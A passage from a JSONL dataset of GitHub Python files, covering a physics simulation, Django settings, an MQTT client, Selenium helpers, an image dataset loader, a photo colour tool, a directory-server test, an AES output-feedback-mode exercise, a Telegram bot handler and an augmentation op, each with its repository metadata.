sdif.dif() < -10 ** -6:\n # if forcage_sign!=1:\n # forcage_sign = 1\n forcage_signi += 1.\n if forcage_signi > 1.:\n forcage += forcage_coef\n if forcage_signi > 3.:\n forcage_signi = 0\n if forcage_sign != 1.:\n forcage_sign = 1.\n if forcage_coef > 10 ** -8: forcage_coef /= 2.\n\n if sdif.full and sdif.dif() > 10 ** -6:\n # if forcage_sign!=-1:\n # forcage_sign = -1\n forcage_signi -= 1.\n if forcage_signi < -1.:\n forcage -= forcage_coef\n if forcage_signi < -3.:\n forcage_signi = 0.\n if forcage_sign != -1.:\n forcage_sign = -1.\n if forcage_coef > 10 ** -8: forcage_coef /= 2.\n\n if (eng != 0 and (eng1 - eng) / eng1 > 2) or eng1 == np.nan or np.isnan(eng):\n # res.append((it*dt,l.d.copy(),L.d.copy()))\n out += (\"\\nconverge (energy goes form {:.4f} to {:.4f})\".format(eng / engz, eng1 / engz))\n _print(out,debug_level=4)\n break;\n engold = eng\n eng = eng1\n\n q = eng / engz\n\n # print(toplot2[0][0][int(it/checkt)], toplot2[0][1][int(it/checkt)])\n\n time_pass = (datetime.datetime.now() - start).total_seconds()\n time_rest = 0 if it-starti <= 0 else time_pass / (it-starti) * (nt - it)\n sign = \"+\" if forcage_sign > 0 else \"-\"\n\n try:\n forcage_true = 0 if forcage==None else forcage\n forcage_coef_true = 0 if forcage==None else forcage\n\n out = \"step {:.2f}M = simTime {:.2f}; forcage = {:.5f}m{}{:.5f}mm; \\nwith energy form {:.4f} to {:.4f} in {:.0f} steps; energyChange = {:.5f}m (<{:.2f}m>); \\ntime passed = {:.1f}min; time rest = {:.1f}min ({:.1f}h)\".format(\n it / (10 ** 6), it * dt, forcage_true * 10 ** 3, sign, forcage_coef_true * 10 ** 6, engold / engz, q,\n checkt, (eng1 - engold) / eng1 * 10 ** 6, sdif.dif() * 10 ** 6, time_pass/60, time_rest/60, time_rest/60/60)\n\n except Exception as e:\n out = (\"text:{}\".format(e))\n _print(out)\n #_print('@', debug_level=1,save=False, saveto=False)\n\n if it % savet == 0:\n if engz == 0: engz = eng1\n _print('---save--- {}/{}/{}_{}.npy'.format(datadir, name, name, int(it / savet)),save=False,debug_level=2)\n # res.append((it*dt,l.d.copy(),L.d.copy(),eng))\n res0 = (it * dt, l.d.copy(), L.d.copy(), eng, forcage, forcage_coef, l.dimx, sdif.dif(), a.d.copy(), A.d.copy(),\n b.d.copy(), B.d.copy(), g.d.copy(), G.d.copy())\n x = np.asarray(list(res0), dtype=object)\n np.save('{}/{}/{}_{}.npy'.format(datadir, name, name, int(it / savet)), x)\n with open('{}/runstatus.txt'.format(path)) as f:\n read_data = f.read()\n if int(read_data)==0:\n dif = (datetime.datetime.now() - start)\n out += (\"\\nEnd. total time {} ({:.3f}s)\".format(dif.__str__(), dif.total_seconds()))\n _print(out, debug_level=5)\n sys.exit(0)\n # time_pass = (datetime.datetime.now() - start).total_seconds()\n # time_rest = 0 if it==0 else time_pass/it*(nt-it)\n\n # txt.set_text(\"step {:.2f}mill = simTime {:.2f}; forcage = {:.5f}+-{:.5f}; energyChange = {:.5f} \\nwith energy form {:.4f} to {:.4f} in {:.0f} steps; \\ntime passed = {:.1f}min; time rest = {:.1f}min\".format(\n # it/(10**6),it*dt,forcage,forcage_coef,(eng1-engold)/eng1,engold/engz,eng/engz,savet,time_pass/60,time_rest/60))\n\n # print(\"step {:.2f}mill = simTime {:.3f}; with energy form {:.4f} to {:.4f} in {:.0f} steps; time passed = {:.1f}min; time rest = {:.1f}min\".format(\n # it/(10**6),it*dt,engold/engz,eng/engz,savet,time_pass/60,time_rest/60))\n # hatmodule1 = hatmodule(res[-1][1],res[-1][2],l.dx)\n\n\n # if not it % int(nt/100):\n # # Display Solution\n # # --------------------------------------\n # res.append((it*dt,sp))\n # print(\"{} = {}\".format(it,it*dt))\n dif = (datetime.datetime.now() - start)\n out += (\"\\nEnd. total time {} ({:.3f}s)\".format(dif.__str__(), dif.total_seconds()))\n _print(out, debug_level=5)\n","repo_name":"kyrylo-gr/gravity-wave-turbulence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30463828259","text":"from django.conf import settings\nimport os\n\nfrom tweetme2.settings.local import BASE_DIR\n\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"my_static\")\n]\n\nSTATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR),\"static_local_cdn\",\"static_root\")\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR),\"static_local_cdn\",\"media_root\")\n\nSTATIC_DICT = {\n \"dir\":STATICFILES_DIRS,\n \"static_root\":STATIC_ROOT,\n \"media_url\":MEDIA_URL,\n \"media_root\":MEDIA_ROOT,\n}","repo_name":"cpatuserkc/demo_twitterclone","sub_path":"tweetme2/static_srv/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43309538591","text":"import paho.mqtt.client as mqtt\nimport threading\nimport time\nimport numpy as np\n\n# for plot\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nis_connected_to_broker = False\ntemperature = 0\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n global is_connected_to_broker\n print(\"Connected with result code \"+str(rc))\n\n # Subscribing in on_connect() means that if we lose the connection and\n # reconnect then subscriptions will be renewed.\n client.subscribe((\"mydome/#\", 2))\n client.subscribe((\"dcsquare/#\", 0))\n client.subscribe((\"lotik/test\", 0))\n\n if rc == 0:\n is_connected_to_broker = True\n timer_callback()\n\n# callback for when client is disconnected\ndef on_disconnect(client, userdata, rc):\n print(\"Connection returned result:\"+str(rc))\n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n global temperature\n print(msg.topic+\" \"+str(msg.payload))\n\n if msg.topic == \"mydome/temp/value\":\n temperature = msg.payload\n\n# 1 second timer callback\ndef timer_callback():\n threading.Timer(1.0, timer_callback).start()\n\n if is_connected_to_broker == True:\n client.publish(\"lotik/test\", time.time())\n\n # for plot\n for i in range(10):\n y = np.random.random()\n plt.scatter(i, y)\n plt.pause(0.05)\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_disconnect = on_disconnect\n\nclient.connect(\"broker.mqttdashboard.com\", 1883, 60)\n\n# for plots\nplt.axis([0, 10, 0, 1])\nplt.ion()\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\nprint(\"Starting the loop..\")\nclient.loop_forever(timeout=1.0)\n","repo_name":"dhavalhparikh/fun-hobby-projects","sub_path":"python-mqtt-client/mqtt_client_try.py","file_name":"mqtt_client_try.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70256599768","text":"from selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException, NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef wait_element(driver, by_content, by=By.XPATH, timeout=8):\n try:\n element_present = EC.presence_of_element_located((by, by_content))\n WebDriverWait(driver, timeout).until(element_present)\n except TimeoutException:\n print(\"Timed out waiting for page to load\")\n return False\n return True\n\n\ndef remove_element(driver, element):\n driver.execute_script(\"\"\"\n var element = arguments[0];\n element.parentNode.removeChild(element);\n \"\"\", element)","repo_name":"alexlopespereira/enapespcd2021","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"44020244657","text":"import numpy as np\nimport os\nimport pandas as pd\nfrom torchvision.datasets.folder import default_loader\nfrom torchvision.datasets.utils import download_url\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision.transforms import transforms\n\n\nclass Cub2011(Dataset):\n base_folder = 'CUB_200_2011/images'\n url = 'https://data.caltech.edu/records/65de6-vp158/files/CUB_200_2011.tgz'\n filename = 'CUB_200_2011.tgz'\n tgz_md5 = '97eceeb196236b17998738112f37df78'\n\n def __init__(self, root, train=True, transform=None, loader=default_loader, download=False):\n self.root = os.path.expanduser(root)\n self.transform = transform\n self.loader = default_loader\n self.train = train\n\n if download:\n self._download()\n\n if not self._check_integrity():\n raise RuntimeError('Dataset not found or corrupted.' +\n ' You can use download=True to download it')\n\n def _load_metadata(self):\n images = pd.read_csv(os.path.join(self.root, 'CUB_200_2011', 'images.txt'), sep=' ',\n names=['img_id', 'filepath'])\n image_class_labels = pd.read_csv(os.path.join(self.root, 'CUB_200_2011', 'image_class_labels.txt'),\n sep=' ', names=['img_id', 'target'])\n train_test_split = pd.read_csv(os.path.join(self.root, 'CUB_200_2011', 'train_test_split.txt'),\n sep=' ', names=['img_id', 'is_training_img'])\n\n data = images.merge(image_class_labels, on='img_id')\n self.data = data.merge(train_test_split, on='img_id')\n\n if self.train:\n self.targets = self.data.target[self.data.is_training_img == 1]\n self.data = self.data.filepath[self.data.is_training_img == 1]\n else:\n self.targets = self.data.target[self.data.is_training_img == 0]\n self.data = self.data.filepath[self.data.is_training_img == 0]\n \n self.targets = self.targets.to_numpy()-1\n self.classes = {}\n for filepath in self.data:\n class_id, class_name = filepath.split('/')[0].split('.')\n class_id = int(class_id)\n self.classes[class_id] = class_name\n self.classes = [self.classes[i] for i in range(1, len(self.classes)+1)]\n self.data = np.array([os.path.join(self.root, self.base_folder, path) for path in self.data])\n\n def _check_integrity(self):\n try:\n self._load_metadata()\n except Exception:\n return False\n\n for filepath in self.data:\n if not os.path.isfile(filepath):\n return False\n return True\n\n def _download(self):\n import tarfile\n\n if self._check_integrity():\n print('Files already downloaded and verified')\n return\n\n download_url(self.url, self.root, self.filename, self.tgz_md5)\n\n with tarfile.open(os.path.join(self.root, self.filename), \"r:gz\") as tar:\n tar.extractall(path=self.root)\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n path = self.data[idx]\n target = self.targets[idx]\n img = self.loader(path)\n\n if self.transform is not None:\n img = self.transform(img)\n\n return img, target\n\nif __name__ == '__main__':\n transform = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406], [0.229,0.224,0.225]),\n ])\n\n cub = Cub2011('data/', transform=transform)\n print(cub.classes)\n input(\"\")\n","repo_name":"eric11220/pretrained-models-in-CL","sub_path":"continuum/dataset_scripts/cub2011.py","file_name":"cub2011.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"31"} +{"seq_id":"11594936326","text":"import cv2\nimport numpy\n\nimport Tool\n\nclass Colours(Tool.Tool):\n def on_init(self):\n self.id = \"colours\"\n self.name = \"Colours\"\n self.icon_path = \"ui/PF2_Icons/Colours.png\"\n self.properties = [\n Tool.Property(\"header\", \"Colours\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"overall_saturation\", \"Saturation\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"hue\", \"Hue\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"kelvin\", \"Colour Temperature\", \"Slider\", 6500, max=15000, min=1000),\n Tool.Property(\"header_ts\", \"Tonal Saturation\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"highlight_saturation\", \"Highlight Saturation\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"midtone_saturation\", \"Midtone Saturation\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"shadow_saturation\", \"Shadow Saturation\", \"Slider\", 0, max=50, min=-50),\n # Red\n Tool.Property(\"header_red\", \"Red\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"red_overall_brightness\", \"Overall Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"red_highlight_brightness\", \"Highlight Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"red_midtone_brightness\", \"Midtone Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"red_shadow_brightness\", \"Shadow Brightness\", \"Slider\", 0, max=50, min=-50),\n # Green\n Tool.Property(\"header_green\", \"Green\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"green_overall_brightness\", \"Overall Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"green_highlight_brightness\", \"Highlight Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"green_midtone_brightness\", \"Midtone Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"green_shadow_brightness\", \"Shadow Brightness\", \"Slider\", 0, max=50, min=-50),\n # Blue\n Tool.Property(\"header_blue\", \"Blue\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"blue_overall_brightness\", \"Overall Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"blue_highlight_brightness\", \"Highlight Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"blue_midtone_brightness\", \"Midtone Brightness\", \"Slider\", 0, max=50, min=-50),\n Tool.Property(\"blue_shadow_brightness\", \"Shadow Brightness\", \"Slider\", 0, max=50, min=-50),\n # Bleed\n Tool.Property(\"header_bleed\", \"Tonal Bleed\", \"Header\", None, has_toggle=False, has_button=False),\n Tool.Property(\"highlight_bleed\", \"Highlight Bleed\", \"Slider\", 0.5, max=1, min=0.001),\n Tool.Property(\"midtone_bleed\", \"Midtone Bleed\", \"Slider\", 0.5, max=1, min=0.001),\n Tool.Property(\"shadow_bleed\", \"Shadow Bleed\", \"Slider\", 0.5, max=1, min=0.001),\n ]\n\n def on_update(self, image):\n if(not self.is_default()):\n im = image\n hue = self.props[\"hue\"].get_value()\n saturation = self.props[\"overall_saturation\"].get_value()\n ct = self.props[\"kelvin\"].get_value()/100.0\n hs = self.props[\"highlight_saturation\"].get_value()\n ms = self.props[\"midtone_saturation\"].get_value()\n ss = self.props[\"shadow_saturation\"].get_value()\n rob = self.props[\"red_overall_brightness\"].get_value()\n rhb = self.props[\"red_highlight_brightness\"].get_value()\n rmb = self.props[\"red_midtone_brightness\"].get_value()\n rsb = self.props[\"red_shadow_brightness\"].get_value()\n gob = self.props[\"green_overall_brightness\"].get_value()\n ghb = self.props[\"green_highlight_brightness\"].get_value()\n gmb = self.props[\"green_midtone_brightness\"].get_value()\n gsb = self.props[\"green_shadow_brightness\"].get_value()\n bob = self.props[\"blue_overall_brightness\"].get_value()\n bhb = self.props[\"blue_highlight_brightness\"].get_value()\n bmb = self.props[\"blue_midtone_brightness\"].get_value()\n bsb = self.props[\"blue_shadow_brightness\"].get_value()\n chbl = self.props[\"highlight_bleed\"].get_value()\n cmbl = self.props[\"midtone_bleed\"].get_value()\n csbl = self.props[\"shadow_bleed\"].get_value()\n\n bpp = float(str(im.dtype).replace(\"uint\", \"\").replace(\"float\", \"\"))\n np = float(2 ** bpp - 1)\n\n out = im.astype(numpy.float32)\n isHr = self._is_highlight(out, (3.00 / chbl))\n isMr = self._is_midtone(out, (3.00 / cmbl))\n isSr = self._is_shadow(out, (3.00 / csbl))\n\n # Colour Temperature\n if(int(ct) != 65):\n r = 0\n if(ct <= 66):\n print(ct <= 66)\n r = 255\n else:\n r = ct - 60\n r = 329.698727446 * numpy.math.pow(r, -0.1332047592)\n if(r < 0):\n r = 0\n if(r > 255):\n r = 255\n\n g = 0\n if(ct <= 66):\n g = ct\n g = 99.4708025861 * numpy.math.log(g) - 161.1195681661\n if (g < 0):\n g = 0\n if (g > 255):\n g = 255\n else:\n g = ct - 60\n g = 288.1221695283 * numpy.math.pow(g, -0.0755148492)\n if (g < 0):\n g = 0\n if (g > 255):\n g = 255\n\n\n b = 0\n if(ct >= 66):\n b = 255\n elif(ct <= 19):\n b = 0\n else:\n b = ct - 10\n b = 138.5177312231 * numpy.math.log(b) - 305.0447927307\n if (b < 0):\n b = 0\n if (b > 255):\n b = 255\n\n r = (r/255.0)\n g = (g / 255.0)\n b = (b / 255.0)\n\n # Red\n out[0:, 0:, 2] = out[0:, 0:, 2] * r\n # Green\n out[0:, 0:, 1] = out[0:, 0:, 1] * g\n # Blue\n out[0:, 0:, 0] = out[0:, 0:, 0] * b\n\n\n\n #Converting to HSV\n\n out = cv2.cvtColor(out, cv2.COLOR_BGR2HSV)\n\n #Hue...\n if (hue != 0.0):\n out[0:, 0:, 0] = out[0:, 0:, 0] + (hue / 100.0) * 255\n\n #Saturation...\n if (saturation != 0.0):\n out[0:, 0:, 1] = out[0:, 0:, 1] + (saturation / 10000.0) * 255\n\n #Saturation Highlights...\n if (hs != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((hs * isHr[0:, 0:, 1]) / 10000.0) * 255)\n\n #Saturation Midtones...\n if (ms != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((ms * isMr[0:, 0:, 1]) / 10000.0) * 255)\n\n #Saturation Shadows...\n if (ss != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((ss * isSr[0:, 0:, 1]) / 10000.0) * 255)\n\n out[out < 0.0] = 0.0\n out[out > 4294967296.0] = 4294967296.0\n\n out = cv2.cvtColor(out, cv2.COLOR_HSV2BGR)\n\n #Red...\n if (rob != 0.0):\n out[0:, 0:, 2] = out[0:, 0:, 2] + (rob / 100.0) * np\n\n # Highlights\n if (rhb != 0.0):\n out[0:, 0:, 2] = (out[0:, 0:, 2] + ((rhb * isHr[0:, 0:, 1]) / 100.0) * np)\n\n # Midtones\n if (rmb != 0.0):\n out[0:, 0:, 2] = (out[0:, 0:, 2] + ((rmb * isMr[0:, 0:, 1]) / 100.0) * np)\n\n # Shadows\n if (rsb != 0.0):\n out[0:, 0:, 2] = (out[0:, 0:, 2] + ((rsb * isSr[0:, 0:, 1]) / 100.0) * np)\n\n #Green...\n if (gob != 0.0):\n out[0:, 0:, 1] = out[0:, 0:, 1] + (gob / 100.0) * np\n\n # Highlights\n if (ghb != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((ghb * isHr[0:, 0:, 1]) / 100.0) * np)\n\n # Midtones\n if (gmb != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((gmb * isMr[0:, 0:, 1]) / 100.0) * np)\n\n # Shadows\n if (gsb != 0.0):\n out[0:, 0:, 1] = (out[0:, 0:, 1] + ((gsb * isSr[0:, 0:, 1]) / 100.0) * np)\n\n #Blue...\n if (bob != 0.0):\n out[0:, 0:, 0] = out[0:, 0:, 0] + (bob / 100.0) * np\n\n # Highlights\n if (bhb != 0.0):\n out[0:, 0:, 0] = (out[0:, 0:, 0] + ((bhb * isHr[0:, 0:, 1]) / 100.0) * np)\n\n # Midtones\n if (bmb != 0.0):\n out[0:, 0:, 0] = (out[0:, 0:, 0] + ((bmb * isMr[0:, 0:, 1]) / 100.0) * np)\n\n # Shadows\n if (bsb != 0.0):\n out[0:, 0:, 0] = (out[0:, 0:, 0] + ((bsb * isSr[0:, 0:, 1]) / 100.0) * np)\n\n\n out[out < 0.0] = 0.0\n out[out > np] = np\n return out.astype(im.dtype)\n else:\n return image\n\n def _is_highlight(self, image, bleed_value = 6.0):\n bleed = float(image.max() / bleed_value)\n mif = image.max() / 3.0 * 2.0\n icopy = image.copy()\n\n icopy[icopy < mif - bleed] = 0.0\n icopy[(icopy < mif) * (icopy != 0.0)] = ((mif - (icopy[(icopy < mif) * (icopy != 0.0)])) / bleed) * -1 + 1\n icopy[icopy >= mif] = 1.0\n return icopy\n\n def _is_midtone(self, image, bleed_value = 6.0):\n bleed = float(image.max() / bleed_value)\n mif = image.max() / 3.0\n mir = image.max() / 3.0 * 2.0\n icopy = image.copy()\n\n icopy[icopy < mif - bleed] = 0.0\n icopy[icopy > mir + bleed] = 0.0\n\n icopy[(icopy < mif) * (icopy != 0.0)] = ((mif - (icopy[(icopy < mif) * (icopy != 0.0)])) / bleed) * -1 + 1\n icopy[(icopy > mir) * (icopy != 0.0)] = (((icopy[(icopy > mir) * (icopy != 0.0)]) - mir) / bleed) * -1 + 1\n icopy[(icopy >= mif) * (icopy <= mir)] = 1.0\n return icopy\n\n def _is_shadow(self, image, bleed_value=6.0):\n bleed = float(image.max() / bleed_value)\n mir = image.max() / 3.0\n icopy = image.copy()\n\n icopy[icopy <= mir] = 1.0\n icopy[icopy > mir + bleed] = 0.0\n icopy[icopy > mir] = (((icopy[(icopy > mir) * (icopy != 0.0)]) - mir) / bleed) * -1 + 1\n return icopy\n","repo_name":"Tilo15/PhotoFiddle2","sub_path":"PF2/Tools/Colours.py","file_name":"Colours.py","file_ext":"py","file_size_in_byte":10640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13408477921","text":"from lib389._constants import *\nfrom lib389 import DirSrv, Entry\nimport pytest\nfrom lib389.utils import ensure_bytes, ensure_str\n\nfrom lib389.mappingTree import MappingTrees, MappingTree\n\nimport sys\nMAJOR, MINOR, _, _, _ = sys.version_info\n\nINSTANCE_PORT = 54321\nINSTANCE_SERVERID = 'standalone'\n\nDEBUGGING = True\n\nclass TopologyStandalone(object):\n def __init__(self, standalone):\n standalone.open()\n self.standalone = standalone\n\n\n@pytest.fixture(scope=\"module\")\ndef topology(request):\n standalone = DirSrv(verbose=DEBUGGING)\n standalone.log.debug(\"Instance allocated\")\n args = {SER_HOST: LOCALHOST,\n SER_PORT: INSTANCE_PORT,\n # SER_DEPLOYED_DIR: INSTANCE_PREFIX,\n SER_SERVERID_PROP: INSTANCE_SERVERID}\n standalone.allocate(args)\n if standalone.exists():\n standalone.delete()\n standalone.create()\n standalone.open()\n\n def fin():\n if not DEBUGGING:\n standalone.delete()\n request.addfinalizer(fin)\n\n return TopologyStandalone(standalone)\n\ndef test_mappingtree(topology):\n\n mts = MappingTrees(topology.standalone)\n mt = mts.create(properties={\n 'cn': [\"dc=newexample,dc=com\",],\n 'nsslapd-state' : 'backend',\n 'nsslapd-backend' : 'someRoot',\n })\n\n rmt = mts.get('someRoot')\n rmt.delete()\n\n\n\n","repo_name":"389ds/389-ds-base","sub_path":"src/lib389/lib389/tests/mappingtree_test.py","file_name":"mappingtree_test.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"17433476497","text":"import helperclass as hc\nimport copy\nfrom aes import AES\nfrom aes_keygen import aes_keygen\n\nclass OFB:\n def __init__(self, initialisation, key=None, block_length=128) -> None:\n self.key = key\n self.block_length = block_length\n if key is None:\n self.key = aes_keygen(hc.read_key_from_file(\"key.txt\"))\n hc.check_aes_key(self.key, self.block_length)\n \n self.aes = AES()\n self.iv = initialisation\n if len(self.iv) != self.block_length:\n raise Exception(\"Wrong length of initialisation vector! It has to be \" + str(self.block_length) + \" but is \" + str(len(self.iv)))\n\n def get_blocks_of_bit_string(self, bit_string):\n return [bit_string[i:i+self.block_length] for i in range(0, len(bit_string), self.block_length)]\n \n def encrypt_text(self, plain_text): \n bit_content = hc.text_to_bit_string(plain_text)\n bit_blocks = self.get_blocks_of_bit_string(bit_content)\n while len(bit_blocks[-1]) < self.block_length:\n bit_blocks[-1] += \"0\"\n \n encryption = \"\"\n last_bit_string = self.iv\n\n for block in bit_blocks:\n res, new_last_bit_string = self.encrypt_block(block, last_bit_string)\n encryption += res\n last_bit_string = new_last_bit_string\n\n return hc.bit_string_to_text(encryption)\n\n def encrypt_block(self, bit_string, last_bit_string):\n # 1. normal encode using the key and the last bit string\n tmp_result = copy.deepcopy(last_bit_string)\n tmp_result = self.aes.encrypt(tmp_result, self.key)\n\n # 2. add tmp_result and the plaintext\n # new_bit_string = \"\"\n # for i in range(self.block_length):\n # new_bit_string += str(int(bit_string[i]) ^ int(tmp_result[i]))\n return hc.xor_add(bit_string, tmp_result), tmp_result\n\n def decrypt_text(self, cipher_text):\n return self.encrypt_text(cipher_text)\n\n\nif __name__ == \"__main__\":\n iv = \"0\" * 128\n\n ofb = OFB(iv)\n\n enc = ofb.encrypt_text(\"Hallo Welt!asdasdd\")\n print(enc)\n\n dec = ofb.decrypt_text(enc)\n print(dec)\n","repo_name":"Hanno1/KryptologieLab","sub_path":"03_betriebsmodi/krypto_ofb_main.py","file_name":"krypto_ofb_main.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27488941204","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 26 16:45:09 2020\n\n@author: ncalvertuk\n\"\"\"\n\nimport re\nimport requests\nimport time\n\nfixtures_url = \"https://www.eliteleague.co.uk/schedule?id_season=2&id_team=0&id_month=999\"\nfixtures_http = requests.get(fixtures_url)\nidxs = [m.start() for m in re.finditer(\"a href=\\\"/game/\", fixtures_http.text)]\ngame_ids = []\nfor ind in idxs:\n ind1 = fixtures_http.text.find(\" class\",ind)\n g_id = fixtures_http.text[ind+8:ind1-1]\n \n track_url = \"https://www.eliteleague.co.uk\" +g_id + \"/tracking\"\n track_http = requests.get(track_url)\n ind2 = track_http.text.find(\"https://eihl.hokejovyzapis.cz/visualization/\")\n ind3 = track_http.text.find(\"\\\"\",ind2)\n s_id = track_http.text[(ind3-4):ind3]\n if(s_id[0] == \"=\"):\n s_id = s_id[1:]\n print(g_id)\n print(s_id)\n if s_id not in game_ids:\n game_ids.append(int(s_id))\n json_url = \"https://s3-eu-west-1.amazonaws.com/eihl.hokejovyzapis.cz/visualization/shots/\" + str(s_id) + \".json\"\n txt = requests.get(json_url).text\n file_name = str(s_id) + \".json\"\n with open(file_name, 'w') as f:\n f.write(txt)\n time.sleep(10)\n\n \n","repo_name":"ncalvertuk/EIHLShots","sub_path":"GetShotMaps.py","file_name":"GetShotMaps.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38575959041","text":"# URI 1043\n# CLEVERSON MENDES FARIA\n\nmedidas = input().split()\n\na = float(medidas[0])\nb = float(medidas[1])\nc = float(medidas[2])\n\nif (a < b + c) and (b < a + c) and (c < a + b):\n perimetro = a+b+c\n print(\"Perimetro = %.1f\" %perimetro)\nelse:\n area = ((a + b) / 2)*c\n print(\"Area = %.1f\" %area)\n","repo_name":"clemendes/Python","sub_path":"PYTHON-URI/1043 - Triângulo.py","file_name":"1043 - Triângulo.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4195773821","text":"from tgbot.models import db\nfrom tgbot.utils import buttons\nfrom tgbot import config\n\n\ndef vendor_purchase_orders(call, bot):\n chat_id = call.message.chat.id\n user_id = call.from_user.id\n message_id = call.message.message_id\n user = db.get_user(user_id)\n products = db.get_products_by_vendor(vendor_id=user_id)\n media, keyboard = buttons.all_products_markup(products, user)\n bot.edit_message_media(\n chat_id=chat_id,\n message_id=message_id,\n media=media,\n reply_markup=keyboard,\n )\n\n\ndef view_purchase(call, bot):\n chat_id = call.message.chat.id\n user_id = call.from_user.id\n purchase_id = call.data.split(\":\")[1]\n purchase = db.get_purchase_by_id(purchase_id)\n user = db.get_user(user_id)\n if purchase == None:\n return bot.delete_message(chat_id=chat_id, message_id=call.message.message_id)\n message_text, keyboard = buttons.view_purchase_markup(\n purchase, user)\n bot.send_message(\n chat_id=chat_id,\n text=message_text,\n parse_mode=\"HTML\",\n reply_markup=keyboard,\n )\n","repo_name":"richardunn/tg_marketplace","sub_path":"tgbot/handlers/purchase.py","file_name":"purchase.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"26107685295","text":"from typing import Iterable, Tuple, Union\n\nfrom albumentations.augmentations.transforms import RandomBrightnessContrast as RandomBrightnessContrastAlb\n\nfrom fastestimator.op.numpyop.univariate.univariate import ImageOnlyAlbumentation\nfrom fastestimator.util.traceability_util import traceable\n\n\n@traceable()\nclass RandomBrightnessContrast(ImageOnlyAlbumentation):\n \"\"\"Randomly change the brightness and contrast of an image.\n\n Args:\n inputs: Key(s) of images to be modified.\n outputs: Key(s) into which to write the modified images.\n mode: What mode(s) to execute this Op in. For example, \"train\", \"eval\", \"test\", or \"infer\". To execute\n regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument\n like \"!infer\" or \"!train\".\n ds_id: What dataset id(s) to execute this Op in. To execute regardless of ds_id, pass None. To execute in all\n ds_ids except for a particular one, you can pass an argument like \"!ds1\".\n brightness_limit: Factor range for changing brightness.\n If limit is a single float, the range will be (-limit, limit).\n contrast_limit: Factor range for changing contrast.\n If limit is a single float, the range will be (-limit, limit).\n brightness_by_max: If True adjust contrast by image dtype maximum, else adjust contrast by image mean.\n\n Image types:\n uint8, float32\n \"\"\"\n def __init__(self,\n inputs: Union[str, Iterable[str]],\n outputs: Union[str, Iterable[str]],\n mode: Union[None, str, Iterable[str]] = None,\n ds_id: Union[None, str, Iterable[str]] = None,\n brightness_limit: Union[float, Tuple[float, float]] = 0.2,\n contrast_limit: Union[float, Tuple[float, float]] = 0.2,\n brightness_by_max: bool = True):\n super().__init__(\n RandomBrightnessContrastAlb(brightness_limit=brightness_limit,\n contrast_limit=contrast_limit,\n 